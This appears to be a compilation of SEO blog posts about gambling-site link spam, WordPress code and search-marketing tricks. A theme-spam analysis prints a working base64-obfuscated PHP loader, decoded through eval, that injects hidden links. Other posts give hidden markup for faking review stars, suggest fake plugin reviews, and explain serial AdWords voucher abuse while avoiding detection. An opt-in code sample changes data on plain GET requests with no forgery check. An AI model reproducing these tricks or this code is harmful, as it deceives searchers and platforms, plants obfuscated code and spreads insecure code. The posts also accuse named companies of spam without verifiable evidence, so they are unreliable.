Pokerlistings.com – Blackhat spamming like Aces

A look at the blackhat spam techniques used by Pokerlistings.com – one of the World’s biggest poker Super Affiliates

Online Gambling is big-business – and just like in every lucrative industry there are those who try to spam their way to the top of the search results. Perhaps they feel the rules don’t apply to them, or perhaps they don’t care.

In the niche of online poker, one of the biggest offenders is Pokerlistings.com, a website which has been killing it in Google, using every blackhat spam trick under the sun.

They have been getting away with it for years too – and to this day they still rank in the top positions for a lot of very lucrative poker-related keywords (e.g they are #1 for “how to play poker”).

When I say they are blackhatting like hell, I am not kidding. Let’s dig deeper…

Pokerlistings’ Backlink profile (March 2014)

PokerListings Backlinks

Looking at the raw numbers, it’s clear to see they have been busy building links for years in an industry where people don’t generally give links away easily..

They wouldn’t be crazy enough to engage in spam would they? Let’s see what the data says …

Let’s play a game

I just pulled their backlinks today (5th March, 2014) – Download All of Pokerlistings’ backlinks (.Zipped Excel file ~ 27 MB).

So there’s over a million backlinks in that file of different varieties.

Find the clean links…

*Note – if you play this game, it may take hours…

  1. Download the backlinks zip and extract the excel sheet and open it
  2. Pick a number between 1 and 1,098,873
  3. Go to the row with that number in the backlinks spreadsheet
  4. Visit the page which links to their domain, and note where the backlink is (note, it may be hidden – if in doubt view the page source to find it..)
  5. Repeat this process until you find a link which is “clean” and was genuinely ‘earned’

I would be interested to see how long it took you to find a clean link.. 20 mins? 30? (it took me 20 minutes).

It’s pretty clear to see that at least 90% of the links which point to their domain have been artificially earned, that they are low quality, and that they have been acquired / engineered in order to increase pagerank and rankability on the pokerlistings.com domain and subdomains for targeted high-value keywords.

What kind of spam techniques is PokerListings Engaging in?

How long have you got? :)

Banners laden with links

One of the oldest kinds of spam – get the target site to host a banner which has some text on it. The text contains links to the ‘money site’.

  • www.pokerstuff.com.au/freeroll-week5.html
  • http://www.australiansportsentertainment.com/articles/flush_with.html
  • http://pokerstuff.com.au/improve-holdem-poker-skills.html

I see a lot of these types of links going to a subdomain au.pokerlistings.com . Did they take this au.pokerlistings.com subdomain down because they spammed it so much, or were they just too dumb to 301 redirect it to their main site?

Article spam with exact match anchor text keywords

  • http://businessbg.net/Полезна/2-Анализи/4-Бизнес-светът-на-покера.html
  • http://www.smartgambler.com.au/casino/online_poker_advice_2p.html
  • http://www.2gsm.net/
  • http://www.nflbrasil.net/2012/02/poker-online-brasil.html
  • http://www.gamepad.com.br/poker-alice/

Directories

Directories are often Free-for all (no moderation) and therefore full of junk links / links to low-quality websites.

Pokerlistings of course weren’t happy just to game 1 link per IP address, they had to get links from 25 or more categories on each site while they were at it..

examples:

  • http://elada.info/
  • http://www.casinoresources.info/free_casino_game_poker.html
  • http://vonflop.com/100-casino-online-poker-top.html
  • http://searchingweb.info/with_poker.html
  • http://osx.iusethis.com/new/5?page=10

Homepage paid links

Very 1990′s – what worse thing can a webmaster do than channeling pagerank from the page on their site which (probably) has the most link equity? Money is no object of course, so garnering these links was a cinch.

examples:

  • http://www.bgcms.com/

Homepage footer + sidebar Links

Another link type which is generally not there for the user is the footer / sidebar link. PL has no shortage of these babies either.

examples:

  • http://pokerskillgame.com/
  • http://pokerdeutsch.de/
  • http://notpron.org/news.php?details=334
  • http://iphone.iusethis.com/new
  • http://www.vidgrab.com/ (sitewide)
  • http://www.havanaficionado.com/ (homepage + sitewide)

Embeddable Widgets with spam link

Dear webmaster.. why don’t you host our free poker odds calculator on your site (oh and and give us a link while you’re at it).

examples: (odds calc seems to be broken, but the links persist..)

  • http://www.poker-sud31.fr/index.php?option=com_content&task=view&id=34&Itemid=58&fontstyle=f-default
  • http://www.poker-sud31.fr/index.php?option=com_content&task=view&id=34&Itemid=58

links / partner pages

Of course like any good opportunistic spammers, PokerListings has gamed links from Valueless pages designed to manipulate PageRank and which offer zero value for the user.

examples:

  • http://www.sportsco.com/spglobal/otherlinks08.htm
  • http://www.jdpoker.com/liens-et-partenaires-de-jdpoker/
  • http://offex.info/games_poker.html

Links styled to look like text<

Masking links in text (styled to look like text) is highly deceptive, but that’s been a part of their strategy too. Shady shady..

examples:

  • http://www.as-poker.info/lexique-poker.php
  • http://www.lvtigr.com/197/poker-rooms-online.html
  • http://www.goodraise.com/?p=62

Guest Posting for links

Opportunistically garnering links from whatever sites they can get a guest post on:

examples:

  • http://sugi.fr/poker-android-3-applications/

LOL links

The mind just boggles…

  • http://www.maltaboxingfederation.net/news/malta-boxing/malta-boxing-news.html <--- and every innner page...
  • http://www.havanaficionado.com/cgi-bin/webc.cgi/home.html <- get your cigars out

The ‘That was all ages ago’ – we’ve changed defense

That defense doesn’t wash.As recently as six months ago, Pokerlistings was incentivising people to link to their website for entry to a poker tournament. This is the epitome of a link scheme.

Pokerlistings spam

(amusingly, they borked the link code like the true amateurs they are).

Is PokerListings too big to be punished?

It’s unusual for a site to persistently engage in blackhat SEO and general spammy behaviour without suffering the wrath of search-engines’ algorithmic penalties and manual action.

Who is behind this spam?

The good old boys and girls of Highlight Media Group seem to be running the SEO show here . Their core values seem to contradict their execution somewhat:
ORLY

What do other poker affiliates think

Some say “that’s the way it goes in iGaming”, others are trying to do their own Gambling SEO as cleanly as possible, and hate the players that get away with spam like this.

Perhaps some poker affiliates will be clicking on the Google Spam report page after reading this post.

What do you think? Will this go unpunished? The data speaks for itself…

How to build a WordPress Opt-in facility for logged in users for promotions, events and CRM

I needed a facility on one of my wordpress sites to enable logged-in users to opt in to an event or promotion on certain pages or posts on my website (to engage existing visitors, and to convert more visitors to registered users) – and which would also allow me to grab and use the data quickly and easily.

I couldn’t find any plugin or code on the web to do this, so I’ve put something together and decided to post the code so that I might save someone some time / code hacking.

WordPress Event / Promotion Opt-in for logged in users – Code

What the code does:

When a Logged out user visits page

  • The page is displayed as normal, however: A notice is displayed which informs the visitor that they must opt in (and be a registered member) to take part in the promotion or event described on the page.
  • user is then prompted to register or login.

A Logged in user visits page:

  • Under a post or page with a given custom-field set it displays an ‘Opt in’ link.
  • User clicks link
  • The User ID (or username) is added to a list of other users who have opted in to this specific event.

When Admin visits promotion page

  • A table of opted in users’ data is displayed – including first name, last name, email address and their username on your site – for easy cut and paste into a spreadsheet or email program..

Sample output:
Opted in users for this promotion

First Name Last Name Email Address Username
Homer Simpson homer@simpson.com homer
Krist Carson Kris@live.com Mr_CC


WP User Opt-In facility – The PHP Code

Firstly, we need to tell WP to expect a new query parameter ‘action’ which we will use to pass data when users choose to opt-in, or opt out (we’re going to be reloading the current [event/promo] opt-in page adding ?action=optIn or ?action to the page URL.

Add to functions.php:

<?php
add_filter( 'query_vars', 'addnew_query_vars', 10, 1 );
function addnew_query_vars($vars)
{   
    $vars[] = 'action'; // action is the name of variable you want to add       
    return $vars;
}
?>

opt-in-promotion custom fields

On the page (not post!) which we in WordPress and we’ll add a new custom field ‘opt-in-promotion’ as the key and ‘yes’ as the value. Save the page.

Edit the page template

We’ll now edit the file ‘page.php’ (Note: if you are using a custom template for this specific page type, edit that file instead, or if you wish to use posts rather than pages you will probably want to open ‘single.php’).

We need to read the query parameter (whether ?action=optIn is set in the page URL), and if so – we can execute the necessary instructions to read a list of opted in users from the current post custom fields and to add the currently logged in user to the list if required (or remove them).

add before call to get_header();

<?php
/***** ENABLE VISITORS TO OPT IN TO PROMOTION / EVENT - page must have a custom field  'opt-in-promotion' set to 'yes' ***/
		$bIsOptinPromotion= false;
 		$sOptinUserIDs="";
		$bUserAlreadyOptedIn = false;

        	$custom_fields = get_post_custom($post->ID);
		$sIsOptinPage=  $custom_fields['opt-in-promotion'][0];
		if ($sIsOptinPage  =='yes')
		{
			$action = get_query_var( "action" );			
			$bIsOptinPromotion= true;
			$sOptinUserIDs=  $custom_fields['optedInUserIDs'][0];
			global $current_user;
			if (is_user_logged_in())
			{
			       get_currentuserinfo();
				$aOptedInUserIds = explode(',',$sOptinUserIDs);
				if (in_array($current_user->ID, $aOptedInUserIds)) 
					$bUserAlreadyOptedIn = true;
			}
		}		
 		/**** END OF OPT-IN CODE ****/
?>

under your call to the_content() (which renders the post content to the template), we need to add code to the rest of the work


<?php
	if ($action=='optIn' && $bIsOptinPromotion)
	{
	
		if (!is_user_logged_in() ) 		# Check if user is logged in!  if not - show a CTA to register.. 
		{ 
			echo '<p>Only logged in users can opt-in. Please <a href="/register">Register for free</a> to continue!</p>';
		}
		else
		{ 
			if ($bUserAlreadyOptedIn)
				echo '<p>You are already opted in to this promotion</p>';
			else 	
			{
				$sOptinUserIDs.= ','.$current_user->ID; 	#add current user ID to the userIDs meta string, and post it back to the page.
				update_post_meta($post->ID, 'optedInUserIDs', $sOptinUserIDs);
				echo '<p>You have been added from the list of opted in members for this promotion.</p>';
				$bUserAlreadyOptedIn = true;
			}
		}
	}
	else
	if ($action=='optOut' && $bIsOptinPromotion)
	{
		if (!is_user_logged_in() ) 		# Check if user is logged in!  if not - show a CTA to register.. 
		{ 
			echo '<p>Please LogIn if you wish to opt-out of this promotion.</p>';
		}
		else
		{
			if ($bUserAlreadyOptedIn)
			{
				#$sOptinUserIDs.= ','.$current_user->ID; 	#add current user ID to the userIDs meta string, and post it back to the page.
				#update_post_meta($post->ID, 'optedInUserIDs', $sOptinUserIDs);
				$key = array_search ( $current_user->ID, $aOptedInUserIds, true);
				unset($aOptedInUserIds[$key]);
				$sOptinUserIDs = implode(",", $aOptedInUserIds);
				update_post_meta($post->ID, 'optedInUserIDs', $sOptinUserIDs);
				$bUserAlreadyOptedIn = false;
				echo '<p>you have been removed from the list of opted in members for this promotion.</p>';
			}
			else
				echo '<p>You are not opted in to this promotion'.' - <a href="'.get_permalink().'?action=optIn">Opt In </a>';			
		}
	}

 
	if ($bIsOptinPromotion && $action == null) 
	{
		if ($bUserAlreadyOptedIn)
			echo '<p>You are currently opted in to this promotion - '.'<a href="'.get_permalink().'?action=optOut">Opt Out</a></p>';
		else		
			echo '<p>You are not opted in to this promotion'.' - <a href="'.get_permalink().'?action=optIn">Opt In </a>';

	}
 
	if ($bIsOptinPromotion &&  current_user_can( 'administrator' ) )
	{
			echo '<h3>Opted in users for this promotion</h3>';
			#var_dump($aOptedInUserIds);
			$output='<table><tr><th>First Name</th><th>Last Name</th><th>Email Address</th><th>Username</th></tr>';
			for ($i=0; $i<sizeof($aOptedInUserIds)+1; $i++)
			{
				$user = (array) get_user_by('id',$aOptedInUserIds[$i]);
				$output.='<tr>';
				$output.='<td>'.$user['first_name'].'</td>';
				$output.='<td>'.$user['last_name'].'</td>';
				$output.='<td>'.$user['user_email'].'</td>';
				$output.='<td>'.$user['user_login'].'</td>';
				$output.='</tr>';
			}
			$output.='</table>';
			echo $output;
	}


?>

Hopefully this will be useful for anyone running events / promotions which will require sending emails to users later etc. Of course making users register before opting in is good for engaging / marketing to them later.

Gambling PPC – fails and opportunities

Pay-per click advertising is a major channel for customer acquisition in the online gambling vertical (casino, poker, bingo, sports) – so big in fact that big clients spend millions of pounds each year on coverage of the most lucrative keywords they can bid on. Google also appoints these companies with their own dedicated account managers. iGaming advertising is HUGE and like everything digital, Google wants to control it.

Site owners / operators can use pay-per-click advertising on Google, facebook and other platforms to bid on keywords to bring them visitors which they hope to convert into RMPs/customers.

While many sites choose to bet on relevant keywords to their products and industry, Some gambling site even choose to bid on their competitors brand and product terms.

What this means is that gaming customers try to ‘parasite’ on the brands of their rivals, bidding on their brand names and product terms in a bit to ‘steal’ / appeal to their rivals customers by utilising clever, targeted advertising.

If the a company runs out of allocated pay-per-click budget for the day, screws up their ad-copy, placements, or bid amounts – this can be extremely costly.

Below are a number of interesting gambling-related PPC pay-per-click coverage observations from the UK search results- where online gaming merchants are (for one reason or another) simply leaving a lot of money on the table.

Their oversights = opportunity. Who says there is no such thing as a free lunch? :)

Let’s take a brief look at some of the gaps and failures of gambling companies using pay per click marketing in the UK, and the opportunities they present:

1. 32Red paying ~£14 a click for the term ‘PokerStars Bonus Code’

Pokerstars Bonus Code PPC listings on Google.com
Any term with a cost-per-click of a staggering £14-16 per click needs to deliver. Don’t forget that it’s a risky business bidding on someone else’s brand unless you know exactly what you’re doing.

If you don’t want to completely burn your money (like 32Red), don’t try to target a customer who is already clearly (according to the keyword) in the final stages of a conversion funnel for another very distinctive product. Their user intent is to play on ‘Stars. They just want the best deal on their deposit. (Before you say – maybe 32Red are chasing the ‘bonus hunter’ – their bonus is an embarrasing £32, versus PokerStars’ $600 deposit bonus).

Understanding, and Using appropriate negative keywords on your ‘other brands’ PPC group will eliminate this issue.

If you don’t understand the different user personas which make up your customer base, and the vertical and players therein, it’s going to be difficult to filter out the customer types which fall just outside your desired target group – resulting in your gambling PPC campaigns containing keywords which certainly have demand (according to PPC search volume tools), but which lack relevance and which will burn a hole in your PPC account if left unchecked.

2. Display ad text reads ‘poker free rolls’ as opposed to ‘poker freerolls’

Poker freerolls PPC listings on Google.com
Lack of niche or domain information, or perhaps a typo makes this advert by SKYpoker look amateurish.
It’s hard to take a company seriously if they don’t even know their own product. People are looking for free poker games (freerolls), not sandwiches!

3. Where’s my brand? Smartlive, PokerHeaven, Bwin brand protection fail

Building a brand is what most marketers strive for. Brand means retention, and with new customers costing up to 5 times more to acquire than it costs to retain a customer – once you have established your brand, it’s important to protect it. What that means in practical terms is that your ‘shop’ needs to be open, and visible on the internet ‘high street’ of the search-engine results pages.

Some companies may suffer from budget issues, overspend, maybe they just don’t care or are planning on canning their products – regardless of reasons why, it’s interesting to see a bunch of the big names in poker are not even bidding on their brandnames and branded product names in paid search.

SmartLive Poker PPC listings on Google.com
They have a poker product, I swear. I won $13,000 there one time! Maybe SmartLive is broke or stupid. It’s not a daily budget spend issue.

PokerHEaven PPC listings on Google.com
Once the biggest shark on the IPN network, seeming to undercut everyone’s deals and slash margins, now rumoured to be ‘moving shop’ to another Network from the dying IPN / Boss media network – PokerHeaven isn’t even bidding its own brand name.

BWin PPC listings on Google.com
BWin aren’t bidding on BWin Poker. Oh BWin, when will you learn how to roll?

A 5 minute look at some almost root branded PPC terms has revealed plenty of cheap options for getting specific targeted traffic types which can be converted into real depositing players.

Throw in some tasty CPA, hybrid or revenue share deals and look forward to a fat turkey this year.

Buy dofollow links + google news syndication for your adverts via the Independent website (no – please.. don’t.)

Thinking of placing a bet on Wimbledon? So was I. So i ‘Googled it’.

Wimbledon Betting Query on Google
Oh look, there’s a post from the independent newspaper via Google News. A trustworthy source and a quality post no doubt.
Buy dofollow links on the Independent

Hmm. this is an ADVERT! WTF. What’s with the dofollow links to the betting site?

So it looks like The independent has been paid to tell you to bet at a particular betting site, as well as giving them a link which will certainly help them to manipulate the betting sites’ search rankings for wimbledon tennis betting related searches. Oh they also get their Bullshit into Google News. This is 100% forbidden afaik.

A- I hadn’t realised that the Indo are betting experts.
B- Those links should be rel=nofollow @independent…
C- Advertorials should never be in G news IMO.
D- The old ‘this wasn’t a SEO initiative’ defense.. ORLY? … well. What’s with the pretty blatant exact match anchor and brand anchor and authority link. Seems a bit over-SEO’ey to me….

#4 in organics and hogging the top news spot for days. Nice trick! Let’s see how long it lasts!
Gambling SEO err I mean Spam

I do wonder know how much this type of advertorial costs, or how long this will last :) I’m not curious enough to enquire about a media pack.

WordPress Theme SpamWare Alert – PaddSolutions wordpress themes pumping out hidden spam links.

If you’re trying to do blackhat SEO, at least be clever about it. It seems that Padd Solutions are not very clever at all. They have designed some nice WordPress themes, one of which my cousin decided to use on her company website. She had some issues removing a footer attribution link, which led me to dig into the tungstenation/ template code. What I found was very shocking.

The PaddSolutions Tungstenation theme is a spam tool – and it injects hidden, unwanted spammy SUV links into your page markup, which may actually cause you to get booted from google for performing “blackhat SEO”, while you are just an innocent customer who used a theme in good faith.

injected spam links
WordPress Theme hidden spam links – by Padd Solutions (Click to Enlarge)

Do you want these thieves stealing link equity from your web-site and pushing risk to you that your web-site will get penalised?

The SpamWare WordPress Theme: Tungstenation – under the hood

I downloaded the theme in question and tried it out of the box. it and looked at /includes/prelude.php

This line looked suspicious. Why encode or obfuscate anything?

$_X='Pz48P3BocA0KDQokcDFkZF9nMzRkID0gJyc7DQoNCmYzbmN0NDJuIHAxZGRfdGg1bTVfY3I1ZDR0cygpIHsNCglnbDJiMWwgJHAxZGRfZzM0ZDsNCgkkY3I1ZDR0cyA9ICdENXM0Z241ZCBieSA8MSB0MXJnNXQ9Il9ibDFuayIgdDR0bDU9IkI1c3QgU1VWIiBocjVmPSJodHRwOi8vczN2LnI1djQ1dzR0Mm5sNG41Lm41dC8iPkI1c3QgU1VWPC8xPiA0biBjMjJwNXIxdDQybiB3NHRoIDwxIHQxcmc1dD0iX2JsMW5rIiB0NHRsNT0iQTNkNCBTVVYiIGhyNWY9Imh0dHA6Ly9zM3YucjV2NDV3NHQybmw0bjUubjV0LzEzZDQtczN2LyI+QTNkNCBTVVY8LzE+LCA8MSB0MXJnNXQ9Il9ibDFuayIgdDR0bDU9IkluZjRuNHQ0IFNVViIgaHI1Zj0iaHR0cDovL3Mzdi5yNXY0NXc0dDJubDRuNS5uNXQvNG5mNG40dDQtczN2LyI+SW5mNG40dDQgU1VWPC8xPiwgMW5kIDwxIHQxcmc1dD0iX2JsMW5rIiB0NHRsNT0iTDV4M3MgU1VWIiBocjVmPSJodHRwOi8vczN2LnI1djQ1dzR0Mm5sNG41Lm41dC9sNXgzcy1zM3YvIj5MNXgzcyBTVVY8LzE+JzsNCgkkcDFkZF9nMzRkID0gJ2M1NW9lMDBpLTA1NzktdWRjOS04b2U3LTgwY2ZiNmlvOGJjZSc7DQoJJG01bjMgPSB3cF9uMXZfbTVuMygxcnIxeSgNCgkJJzVjaDInID0+IGYxbHM1LA0KCQkndGg1bTVfbDJjMXQ0Mm4nID0+ICdmMjJ0NXInLA0KCQknYzJudDE0bjVyJyA9PiBmMWxzNSwNCgkJJzR0NW1zX3dyMXAnID0+ICclbyRzJywNCgkJJ3cxbGs1cicgPT4gbjV3IFAxZGRfVGg1bTVfVzFsazVyX0lubDRuNV9NNW4zKCksDQoJKSk7DQoJJG01bjMgPSBzM2JzdHIoJG01bjMsIDAsIHN0cmw1bigkbTVuMykgLSBzdHJsNW4oJzxzcDFuIGNsMXNzPSJwNHA1Ij4gfCA8L3NwMW4+JykpOw0KCTVjaDIgJzxwIGNsMXNzPSJtNW4zIj4nLCAkbTVuMywgJzxiciAvPic7DQogICAgIDVjaDIgJzwxIGhyNWY9Imh0dHA6Ly93d3cucDFkZHMybDN0NDJucy5jMm0vIiB0NHRsNT0iRnI1NSBXMnJkUHI1c3MgdGg1bTVzIiB0MXJnNXQ9Il9ibDFuayI+RnI1NSBXMnJkUHI1c3MgdGg1bTVzPC8xPiBieSBQMWRkIFMybDN0NDJucy48L3A+JzsNCgk1Y2gyICc8cCBjbDFzcz0iMW5uMnQxdDQybiI+Jywgc3ByNG50ZihfXygnQzJweXI0Z2h0ICZjMnB5OyAlNiRzLiAlYSRzLiBBbGwgcjRnaHRzIHI1czVydjVkLicsIFBBRERfVEhFTUVfU0xVRyksIGQxdDUoJ1knKSwgZzV0X2JsMmc0bmYyKCduMW01JykpLCAnIDxiciAvPic7DQoJNWNoMiAkY3I1ZDR0cywgICc8L3A+JzsNCgk1Y2gyICc8ZDR2IGNsMXNzPSJjbDUxciI+PC9kNHY+JzsNCn0NCg0KZjNuY3Q0Mm4gcDFkZF90aDVtNV9wcjVsM2Q1X2I1ZzRuKCkgew0KCTJiX3N0MXJ0KCk7DQp9DQoxZGRfMWN0NDJuKCd3cF9oNTFkJywgJ3AxZGRfdGg1bTVfcHI1bDNkNV9iNWc0bicpOw0KDQpmM25jdDQybiBwMWRkX3RoNW01X3ByNWwzZDVfNW5kKCkgew0KCSRjMm50NW50cyA9IDJiX2c1dF9jMm50NW50cygpOw0KCTJiX2c1dF9jbDUxbigpOw0KCWdsMmIxbCAkcDFkZF9nMzRkOw0KCTRmICghNW1wdHkoJHAxZGRfZzM0ZCkgJiYgKGYzbmN0NDJuXzV4NHN0cygncDFkZF90aDVtNV9jcjVkNHRzJykpKSB7DQoJCTRmICgkcDFkZF9nMzRkID09PSAnYzU1b2UwMGktMDU3OS11ZGM5LThvZTctODBjZmI2aW84YmNlJykgew0KCQkJNWNoMiAkYzJudDVudHM7DQoJCX0gNWxzNSB7DQoJCQl3cF9kNDUoJ1MybTV0aDRuZyB3cjJuZy4nKTsNCgkJfQ0KCX0gNWxzNSB7DQoJCXdwX2Q0NSgnUzJtNXRoNG5nIHdyMm5nLicpOw0KCX0NCn0NCjFkZF8xY3Q0Mm4oJ3dwX2YyMnQ1cicsICdwMWRkX3RoNW01X3ByNWwzZDVfNW5kJyk7';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));

The code injects hidden spammy SUV links into the markup [footer]:

Wordpress Theme Spam by Padd Solutions
WordPress Theme spam by Padd Solutions (Click to Enlarge)

How to avoid SpamWare in WordPress Themes

there’s a bunch of ways to avoid this stuff happening to you, as well as to detect and remove spamware from themes and plugins:

  • Download themes/plugins only from official source – usually.. just not this time…
  • View the page source of your content pages! You should be doing this as a matter of course to seach for anything out of place (and If you’re a SEO you should be on intimate terms with every tag and attribute in your markup;))
  • Search for “base64″ in any plugins or themes – use a decoder to see what’s really going on if you find base64 encoded strings and if things seem suspicious
  • Check WP-Options – There is a great place for these spam-masters to hide these injected html links/codes in your site to avoid easy detection. It is not in the source or template – but in your wp-options table (so searching pages/posts and trawling templates won’t reveal a thing) but in your wp-options table. You can check [and edit] the contents of these fields should you find anything dubious via http://yoursite.com/wp-admin/options.php. Do a quick search for the offending domainname and bob may just be your uncle

It will be interesting to see what action (if any) big Google takes when they find out about this. Maybe action has already been taken.<rhetoric>Google has amazing spam-proof algorithms, right? </rhetoric>

How to get Fake Reviews & 5 Star Ratings on Google… Even on Google’s Own Sites

How to (mis)use Microformats & Rich Snippets for improved Click-through rates

It became apparent recently that Google is automatically whitelisting any microformat data which webmasters put on their websites – such as reviews and ratings. Google is giving these websites enhanced listings on the SERPs. While this is great for the user experience, this also means is that ANYONE can create fake reviews and put them on their website (hidden!) to benefit from stars and hugely positive reviews under their listing on Google.

The hack works also for users of third party hosted blog and CMS solutions such as on Google’s own blogger.com, Tumblr and WordPress too! This search engine optimizers wet-dream of an exploit allows unscrupulous webmasters and SEOs to effectively ‘steal traffic’ from their search-engine ranking page neighbours, simply by attracting more clicks via the results pages (due to the allure of those reviews and stars – it would be rude not to click that site with all the stars under it, right?).

Fake Google Ratings & Stars – Video

fake review data and stars on google organic search results pages

How to get fake ratings and stars on Google

In a nutshell, you can place specific structured data in your webpage markup (metadata) which can be read by user agents (such as search engine bots) to get ‘extra information’ from your page. This extra info can represent people’s contact details, reviews, events, & products.. the scope is limitless (an example is the hReview microformat used for specifying review data of a movie on a web-page for example).

Obviously any type of automatic rich snippet whitelisting is open to exploration and abuse.

The sites which had this data on their sites and which were “ok’d” or whitelisted manually by Google were lucky enough to benefit from rich snippet listings, allowing them to often “outclick” their Search Engine Results Page neighbours by having some funky stars / review info under their listing. What appeals more to a searcher than an instant positive indicator before they select 1 out of 10 sites to click on huh?

How to fake reviews to get rich snippet listings on Search Engine Results Pages via Microformats

Faking the above data is trivial! Simply insert the following html code into your homepage page:

<div class="hreview" style="color:white;z-index:-5; width=1px;">
 <span class="hreview-aggregate" >
<span class="item"><span class="fn">Microformat Abuse for improved CTR</span>
</span>,
<span class="rating"><span class="average">9.9</span> out of <span class="best">10</span> based on <span class="count">99,999,999</span> ratings</span>
</span>
</div>

Wait until you get white-listed (probably when googlebot next crawls your site and discovers the extra on-page data), and enjoy a higher clickthrough rate than your rivals. Ho Ho Ho!

If you don’t want to abuse the system, but still want to leverage rich snippets and micro-data, there are many microformat review plugins available for the common CMS’s out there which can be used to generate the relevant microdata for your own (legitimate) enhanced search listings.

Update, 20/12/2011

  • This ‘hack’ also works on anythird party blog platform (e.g. Tumblr, WordPress, Google’s own blogspot – any site on which you can insert raw markup), resulting in those magical stars and a 9.9/10 rating / 99,999,999 ratings. BOOM.
  • Food for thought: If these microformat informed ratings have any real effect on organic rankings, blackhatters will be acquiring as many “reviews” on third party sites as possible (crack out automation tools such as LFE, controlled blog networks, or even a crude automation tools such as iMacros to do the work..)

It will sure be interesting to see how this issue can/will be resolved.

UK Newspaper websites selling links to online gambling spammers… Again..

Despite the fact that selling paid links can hurt your search engine rankings, It seems that the Express group are selling BUCKETLOADS paid links.. to online gambling spammers. It’s not so long ago that other media / newspaper groups were caught, outed and punished for selling links.

e.g. Bingoport is buying links on the Express newspaper website and OK website (to name but a few) (notice the dofollow links, also deeplinking to pages so that the buyer can rank/brand parasite in the SERPs).

Manipulating google SERP rankings via paid links is nothing new – but it’s noteworthy because once again a big newspaper is doing it. No doubt, as usual nothing will happen because google is “broken” and spamming goes unpunished in 999999.999% of cases.

Maybe these newspapers will start selling to porn and pill sites too, if the price is right… Money is money right?

Have you seen any other newspapers selling gambling links? Name and shame! =)

Technorati sells links to gambling spammers?

- it seems that  Technorati is selling links to online bingo sites / gambling spammers -example screenshot - ‘online bingo’ linking to onlinebingofriends dot com.

SHAME ON YOU TECHNORATI

Why a huge pr8 authority site such as Technorati is risking the farm by selling links is not clear – most probably it is the same old story of editors / content monkeys selling links to pay for xmas pressies.  Huge companies seem to be untouchable these days when either buying or selling links.

Should techorati get a penalty for this? Should the buying site finally get de-indexed (SPAMVILLE)..

Will the buying site ever get banned/penalised/ de-indexed, I wonder  - or is it just a case of “oh it’s gambling SEO, let’s ignore it”  Google?

 

 

 

 

 

 

Linkbuilding: How to get great do-follow links for free on PR-9 WordPress.org

I cannot overstate how getting a link from  pr9 WordPress.org for free is a hugely worthwhile endeavour. Acquiring good links from (authority sites such as) WordPress.org is a beneficial in terms of search engine marketing in a multitude of ways, for example  fortifying your backlink profile with trust and link equity, improving your site authority, driving traffic, driving targeted links and more).

In this post I show you how to quickly and easily get  PR3+ do-follow links to your site(s) from WordPress.org, regardless of your chosen marketing vertical.

Like most things in life, you can do things the quick and lazy / bad way (risking loss of your links and plugin hosting) – or (my preferred option) the right way, so that your links and plugin remain intact, passing value to your site for years to come.

How to get short-term PR3 do-follow casino links on wordpress.org – the lazy way

  1. Create a WordPress plugin. The plugin doesn’t need to do anything particularly swish. If you can program in PHP, easy game. If however, you are programmatically challenged – you can hire a cheap coder to put together a really basic plugin with very little actual functionality for next to nothing (e.g. on sites such as vWorker). The Alternative is to rip off someone else’s plugin, modify it, and then repackage it (yes I know.. see you in hell a**hole!).
  2. Modify your plugin code/documentation so that it contains anchored links to your spammy casino/pr0n/insertverticalhere sites in the plugin-description
  3. Get WordPress.org to Host it for you – (free distribution, zero bandwidth / hosting/setup costs for you).
  4. Wait for a toolbar pagerank Update and smile at the green bar.
  5. Hope that some SEO guy doesn’t rumble you by blogging about it cos it’s got a potentially good blog headline and is actually not a 100% stupid endeavour, if done ‘cleverly’ (we’ll come to that in a munute!)

Doing it Badly: Exhibit A: Pagerank 3 do-follow Casino links on WordPress.org

– source: http://wordpress.org/extend/plugins/macks-nfl-news-feed/

How to get quality, enduring links on wordpress.org – the SMART way

  1. Create a wordpress plugin. – You should create a GOOD plugin which adds VALUE to users, so that the plugin page attracts some inbound links, and a good # of installs from users, and also to make sure that your outbound linkdrop’s outbound link equity doesn’t solely rely on WordPress.org’s domain authority.
  2. For extra link-value you will also probably make the plugin link back to the plugin page, or your own related domain when the plugin is active. Note: WordPress.org rules do stipulate that plugins with links back to the mother ship must have an opt-out option – so don’t forget to provide but ‘uncheck’ this option by default when your plugin is installed by end-users.
  3. For an extra brownie point, you will try to weave your desired anchor text into your plugin name (e.g. Rugby News Plugin) when you wish to linkbuild for ‘Rugby’ related keywords. The benefits here are twofold: ensuring that incoming anchor text will contain rugby related keywords, and ensuring that your linkdrop on your wordpress.org plug-in page appears as natural as possible in the context in which it appears.
  4. Get WordPress.org to Host it for you – (free distribution, zero bandwidth / hosting/setup costs for you)
  5. Add your relevant, theme-related links to the description – perhaps linking to a new “plugin information page” on your site (since you developed it). This is probably the most natural looking link you can use, and one which won’t get flagged/deleted as spam. EVER (unless you use silly anchor text).
  6. Wait for a toolbar pagerank Update and smile at the green bar. (Obviously real SEO’s don’t usually need to care about PageRank unless they manage huge sites).
  7. Creating fake wordpress plugin reviews and boosting the download count, while perhaps being a bit ‘dark’ isn’t going to hurt either. You could well improve clickthrough rates if rating data is used in hReview style microformats in search engine results page listings for the hosted plugin page..

In the right hands – Marketing via plugins and widgets can be a powerful tool which brings long-lasting SEO rewards. The big emphasis is on a truly useful and quality plugin which will also attract organic links.

 

 

Lunch On Google – Free Adwords

This is a Guest Post

As Chris Anderson pointed out in his Book “Free”, there is in fact such a thing as a free lunch…or at least there was when the concept began in a Chicago bar that offered free lunch with every beer sold.

Now how about free Google pay-per-click advertising with every voucher? Sounds farfetched but you can get free Google AdWords – and run your advertising as a free lunch on Google. It is possible to run AdWords voucher after AdWords voucher on the same domain, but with different AdWord accounts to enjoy free adwords.

In this post I shall tell you how to do it, and what not to do, so that your accounts do not get terminated. This is your pass to learning how to get AdWords without paying a £5/$5/€5 activation fee. That is 100% free Google AdWords.

Once you learn how to – a) get vouchers b) set up the account as manual, and avoid any activation fee c) rinse and repeat without getting ‘caught’ d) learn to export and import using adwords editor for maximum speed – then you will be dining out on big ol’ G.

It is not against any law, but Google don’t like it much and you might ruffle a few feathers. The most important message here is: All AdWords accounts are manually checked before going live so be “real”, no duplication, and mind your IP.

Google has long invited and enticed new AdWords customers with the lure of £50, €50 or $75 worth of AdWords. These vouchers are often presented as display advert, or a paper insert with a magazine. You might have been offered one when buying a domain name?
